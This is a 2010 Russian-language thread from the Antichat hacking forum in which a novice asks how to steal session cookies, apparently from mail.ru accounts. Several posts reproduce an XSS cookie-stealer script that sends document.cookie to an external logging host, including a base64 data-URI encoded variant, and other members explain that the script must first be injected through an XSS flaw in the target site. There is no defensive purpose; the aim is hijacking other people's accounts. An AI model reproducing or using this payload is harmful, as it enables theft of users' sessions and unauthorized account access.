ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 09.03.2010, 18:29
Аватар для гаррет-тень
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию

Цитата:
Сообщение от seofilms  
и что ты планировал тут увидеть ??? у тебя запишется только Ip + в query надпись document.cookies;, тебе надо еще найти xss на сайте...
я видео смотрел и читал на мейле так ломают?
 
Ответить с цитированием

  #12  
Старый 09.03.2010, 18:31
Аватар для гаррет-тень
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию

точнее так можно)
 
Ответить с цитированием

  #13  
Старый 09.03.2010, 18:37
Аватар для tracy
tracy
Познающий
Регистрация: 24.03.2009
Сообщений: 54
Провел на форуме:
333485

Репутация: 13
По умолчанию

Ты видимо не правильный запрос вписал
 
Ответить с цитированием

  #14  
Старый 09.03.2010, 18:47
Аватар для гаррет-тень
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию

а как по правильно? открой тайну)
 
Ответить с цитированием

  #15  
Старый 09.03.2010, 18:50
Аватар для гаррет-тень
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию

в setcookie данные передаются из формы... имеешь в виду чем длиннее введенные данные в форме тем длиннее куки?)
 
Ответить с цитированием

  #16  
Старый 09.03.2010, 18:58
Аватар для warlok
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Цитата:
в setcookie данные передаются из формы... имеешь в виду чем длиннее введенные данные в форме тем длиннее куки?)
Неважно с откуда они передаются, я о том это зависит от программиста который сам решает что ему писать в кукисы. Я уж незнаю есть ли там у тебя xss или нет если всеже нет то то заставь вставить твой код в адресную строку при открытой странице.
 
Ответить с цитированием

  #17  
Старый 09.03.2010, 20:20
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от гаррет-тень  
вот именно, я подкидываю файл с таким содержанием <script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script> И ГДЕ МОИ КУКИ????

этот файл нужно не подкинуть, а сделать так, чтоб
код

PHP код:
<script>
img = new Image(); img.src "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</
script
чудесным образом был внедрён на сайт mail.ru (если тебя mail.ru интересует)

механизм внедрения такого кода называется "XSS"

Вот когда это условие будет выполнено - приступай к следующему этапу
 
Ответить с цитированием

  #18  
Старый 10.03.2010, 07:40
Аватар для гаррет-тень
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию

то есть сначало нужно найти xss, а потом отправлять) спс)
 
Ответить с цитированием

  #19  
Старый 10.03.2010, 15:16
Аватар для гаррет-тень
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию

и все-таки не догоняю...
 
Ответить с цитированием

  #20  
Старый 10.03.2010, 15:20
Аватар для гаррет-тень
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме:
124940

Репутация: 1
По умолчанию

вот например такое проходит PHNjcmlwdD4NCmFsZXJ0KFhTUykNCjwvc2NyaXB0Pg== что равно <script>alert(XSS)</script>. а data:text/html;base64,PHNjcmlwdD4NCmltZyA9IG5ldyBJbWFnZSgpOy BpbWcuc3JjID0gImh0dHA6Ly9odHRwei5ydS9u
cGhpcjhseG0xeS5naWY/Iitkb2N1bWVudC5jb29raWU7DQo8L3NjcmlwdD4= что значит <script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script>
не проходит( ведь если проходит "><script>alert()</script> значит уязвимость есть, следовательно и куки должны вороваться
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ввожу краденные куки в Mail и нифига!!! почему так? Dr..VATSON Болталка 21 11.01.2010 09:14
Аудит аутентификации на Web-сайтах. Часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:20
Проверка надежности Web-приложений. Часть Третья k00p3r Чужие Статьи 0 13.06.2005 11:17



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ